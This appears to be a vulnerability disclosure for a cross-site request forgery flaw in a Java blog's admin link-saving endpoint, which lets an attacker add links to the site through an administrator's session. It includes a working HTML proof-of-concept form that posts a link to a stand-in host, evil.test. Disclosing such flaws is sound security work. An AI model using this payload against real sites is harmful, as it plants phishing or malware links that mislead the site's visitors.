CSRF on Link Management leading to Unauthorized External Redirects

[mukyuuhate]

Description

The com.site.blog.my.core.controller.admin.LinkController#save endpoint lacks CSRF protection. This allows an attacker to add "Friend Links" to the website through the admin's authenticated session.

Impact

Attackers can insert malicious links (e.g., to malware or phishing domains) onto the website’s homepage or footer. This exploits the trust of the site's visitors and can be used for malicious SEO backlinking or directing users to harmful external content.

Cause

The link submission endpoint treats cross-site POST requests as valid as long as a session cookie is present.

com.site.blog.my.core.controller.admin.LinkController#save

Arbitrary friend link upload

Before the attack

After the attack

payload：

<!doctype html>
<html>
<head><meta charset="UTF-8"><title>CSRF – /admin/links/save</title></head>
<body>
  <p>Create friend link. POST /admin/links/save.</p>
  <form action="http://127.0.0.1:28083/admin/links/save" method="POST">
    <input type="hidden" name="linkType" value="0">
    <input type="hidden" name="linkName" value="Malicious CSRF Link">
    <input type="hidden" name="linkUrl" value="http://evil.test">
    <input type="hidden" name="linkDescription" value="Inserted via CSRF">
    <input type="hidden" name="linkRank" value="1">
    <button type="submit">Send</button>
  </form>
</body>
</html>